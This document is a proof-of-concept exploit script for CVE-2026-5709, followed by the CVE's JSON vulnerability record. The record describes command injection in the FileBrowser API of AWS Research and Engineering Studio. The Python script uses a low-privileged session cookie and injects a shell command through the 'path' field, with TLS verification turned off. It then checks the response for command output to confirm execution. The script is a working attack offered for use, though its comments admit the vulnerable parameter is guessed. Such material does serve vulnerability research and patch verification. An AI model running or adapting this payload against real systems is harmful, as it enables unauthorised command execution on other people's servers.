CVE-2026-5709

import requests # Target URL of the vulnerable AWS RES instance target_url = "https://<target-res-domain>/api/filebrowser" # Valid session cookie for a low-privileged authenticated user session_cookie = "<valid_session_id>" # Headers headers = { "Content-Type": "application/json", "Cookie": f"session={session_cookie}" } # Malicious payload attempting command injection # Assuming the vulnerable parameter is 'path' or similar based on file browser context payload = { "action": "read", "path": "/opt/aws/res; id; #" # Injection payload to execute 'id' command } try: response = requests.post(target_url, json=payload, headers=headers, verify=False) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response content:") print(response.text) # Check if command execution output (e.g., 'uid=') is present if "uid=" in response.text or "gid=" in response.text: print("[!] Command Injection Vulnerability Confirmed!") else: print("[-] Vulnerability not triggered or output not reflected.") else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-5709", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2026-04-06T22:16:25.627", "lastModified": "2026-04-10T20:03:29.473", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unsanitized input in the FileBrowser API in AWS Research and Engineering Studio (RES) version 2024.10 through 2025.12.01 might allow a remote authenticated actor to execute arbitrary commands on the cluster-manager EC2 instance via crafted input when using the FileBrowser functionality.\n\nTo remediate this issue, users are advised to upgrade to RES version 2026.03 or apply the corresponding mitigation patch to their existing environment."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:amazon:research_and_engineering_studio:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026.03", "matchCriteriaId": "37A2F72E-0B0A-4D66-94DA-E0D9D336E9E1"}]}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/2026-014-aws/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/aws/res/issues/150", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/aws/res/releases/tag/2026.03", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Release Notes"]}]}}